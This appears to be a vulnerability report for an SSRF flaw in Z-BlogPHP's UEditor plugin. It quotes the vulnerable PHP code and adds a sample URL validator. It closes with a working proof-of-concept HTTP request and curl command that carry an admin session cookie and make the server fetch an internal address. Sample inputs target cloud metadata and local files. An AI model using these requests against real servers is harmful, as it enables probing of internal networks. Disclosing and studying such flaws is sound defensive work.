CVE-2022-40357: [Vuln] SSRF vulnerability in saveRemote Function · Issue #336 · zblogcn/zblogphp
A security issue was discovered in Z-BlogPHP <= 1.7.2. A Server-Side Request Forgery (SSRF) vulnerability in the zb_users/plugin/UEditor/php/action_crawler.php file (reached through the bundled UEditor plugin's controller.php with action=catchimage) allows remote attackers to force the application to make arbitrary requests by injecting arbitrary URLs into the source parameter. The only check applied to the URL is that it starts with the string "http", so internal and loopback addresses are accepted.
Test Environment: Ubuntu and PHP 7.2
Impact version: Z-BlogPHP <= 1.7.2
Relevant code (comments translated from the original Chinese):

```php
// zb_users/plugin/UEditor/php/controller.php
$action = $_GET['action'];

switch ($action) {
    case 'config':
        $result = json_encode($CONFIG);
        break;

    /* upload image */
    case 'uploadimage':
    /* upload scrawl (doodle) */
    case 'uploadscrawl':
    /* upload video */
    case 'uploadvideo':
    /* upload file */
    case 'uploadfile':
        $result = include "action_upload.php";
        break;

    /* fetch remote file */
    case 'catchimage':
        $result = include "action_crawler.php";
        break;

    default:
        $result = json_encode(array(
            'state' => '请求地址出错', // "request address error"
        ));
        break;
}
```
```php
// zb_users/plugin/UEditor/php/action_crawler.php
foreach ($source as $imgUrl) {
    $item = new Uploader($imgUrl, $config, "remote");
    $info = $item->getFileInfo();
    array_push($list, array(
        "state"    => $info["state"],
        "url"      => $info["url"],
        "size"     => $info["size"],
        "title"    => htmlspecialchars($info["title"]),
        "original" => htmlspecialchars($info["original"]),
        "source"   => htmlspecialchars($imgUrl),
    ));
}
```
```php
// zb_users/plugin/UEditor/php/Uploader.class.php
public function __construct($fileField, $config, $type = "upload")
{
    global $zbp;
    $this->stateMap['ERROR_TYPE_NOT_ALLOWED'] = $zbp->lang['error']['26'];
    $this->stateMap['ERROR_SIZE_EXCEED']      = $zbp->lang['error']['27'];
    $this->stateMap['ERROR_UNKNOWN']          = $zbp->lang['error']['0'];
    $this->fileField = $fileField;
    $this->config    = $config;
    $this->type      = $type;
    if ($type == "remote") {
        $this->saveRemote();
    }
    ...
}

...

private function saveRemote()
{
    global $zbp;
    $imgUrl = htmlspecialchars($this->fileField);
    $imgUrl = str_replace("&amp;", "&", $imgUrl);

    // verify the URL starts with "http"
    if (strpos($imgUrl, "http") !== 0) {
        $this->stateInfo = $this->getStateInfo("ERROR_HTTP_LINK");
        return;
    }
    // fetch the response headers and check for a dead link
    $heads = get_headers($imgUrl, 1);
    ...
}
```
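For comparison, the following is an added example of the kind of allow-list validation that is missing in front of get_headers() above. It is not Z-BlogPHP or UEditor code; the function names (is_safe_remote_url, ip_literal_or_resolve, is_public_ip) and the sample URLs are hypothetical, chosen to exercise the inputs the "starts with http" check lets through.

```php
<?php
// Added example (not Z-BlogPHP/UEditor code). Function names are hypothetical.
// Idea: instead of strpos($url, "http") === 0, require an exact http/https
// scheme, no userinfo, a standard port, and a host that resolves only to
// public addresses. Anything else is rejected before any request is made.

function is_safe_remote_url(string $url): bool
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;                          // no scheme/host, e.g. file:///etc/passwd
    }
    // "httpx://..." starts with "http" but is not a web URL; compare the scheme exactly.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Credentials in the URL and non-standard ports are typical ways of reaching
    // internal services; refuse them outright.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;
    }
    if (isset($parts['port']) && !in_array($parts['port'], [80, 443], true)) {
        return false;
    }
    $host = trim($parts['host'], '[]');        // strip IPv6 literal brackets
    $ips  = ip_literal_or_resolve($host);
    if ($ips === []) {
        return false;                          // unresolvable: fail closed
    }
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) {
            return false;                      // any private/loopback answer rejects the URL
        }
    }
    return true;
}

// Returns the IP literal itself, or every A/AAAA answer for a hostname
// (assumes DNS is reachable; an empty array means "could not resolve").
function ip_literal_or_resolve(string $host): array
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return [$host];
    }
    $ips = [];
    foreach (@dns_get_record($host, DNS_A | DNS_AAAA) ?: [] as $rr) {
        if (isset($rr['ip']))   { $ips[] = $rr['ip']; }
        if (isset($rr['ipv6'])) { $ips[] = $rr['ipv6']; }
    }
    return $ips;
}

// FILTER_FLAG_NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16, fc00::/7;
// FILTER_FLAG_NO_RES_RANGE rejects 0/8, 127/8, 169.254/16, 240/4, ::1, :: and similar.
function is_public_ip(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Constructed inputs: the PoC target from this report plus variants that the
// original strpos() check would accept. 203.0.113.0/24 is an RFC 5737
// documentation prefix that filter_var() does not treat as reserved.
$samples = [
    'http://172.16.119.1/zfuzz'      => false, // RFC 1918 host used in the PoC
    'http://127.0.0.1:8080/'         => false, // loopback, internal port
    'http://[::1]/'                  => false, // IPv6 loopback
    'http://169.254.169.254/latest/' => false, // link-local (cloud metadata)
    'httpx://203.0.113.5/'           => false, // passes strpos("http") but wrong scheme
    'file:///etc/passwd'             => false, // no host at all
    'http://user@203.0.113.5/a.png'  => false, // userinfo present
    'http://203.0.113.5/a.png'       => true,
    'https://203.0.113.5:443/a.png'  => true,
];
foreach ($samples as $url => $expected) {
    $got = is_safe_remote_url($url);
    printf("%-34s %-6s %s\n", $url, $got ? 'allow' : 'reject',
        $got === $expected ? '' : '(UNEXPECTED)');
}
```

Two caveats apply to any check of this shape. It validates the URL before the request, but get_headers() uses PHP's http stream wrapper, which follows redirects by default, so a public host can still bounce the server to an internal address unless follow_location is disabled in the stream context (or the fetch is done with curl and CURLOPT_FOLLOWLOCATION off) and each hop is re-validated. Likewise, a hostname can resolve differently between the check and the fetch (DNS rebinding); pinning the validated IP for the actual connection closes that gap.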
Because the only validation saveRemote() performs on each element of the source parameter is that it starts with "http", any http:// or https:// URL, including private, link-local and loopback addresses, reaches get_headers(), which issues the request from the server. This lets an attacker use the server to probe intranet web services; a dead-link error versus a success state in the JSON response distinguishes reachable targets. Note that the request below carries an admin session cookie, so the PoC as recorded was issued with an authenticated session. The corresponding PoC is as follows:
```http
GET /zblog/zb_users/plugin/UEditor/php/controller.php?action=catchimage&source[1]=http://172.16.119.1/zfuzz HTTP/1.1
Host: 172.16.119.145
Cookie: timezone=8; username=admin; token=eec828fbf6857c2620e0bcd3d128a142e225dbaaac76572657c30d36b0df0a861665059400; addinfozblog=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D
Connection: close
```
You can also use the following curl command to verify the vulnerability (the cookie values are those of the test session above and must be replaced with a valid session for the target):
```shell
curl -i -s -k -X $'GET' \
    -H $'Host: 172.16.119.145' -H $'Connection: close' \
    -b $'timezone=8; username=admin; token=eec828fbf6857c2620e0bcd3d128a142e225dbaaac76572657c30d36b0df0a861665059400; addinfozblog=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D' \
    $'http://172.16.119.145/zblog/zb_users/plugin/UEditor/php/controller.php?action=catchimage&source[1]=http://172.16.119.1/zfuzz'
```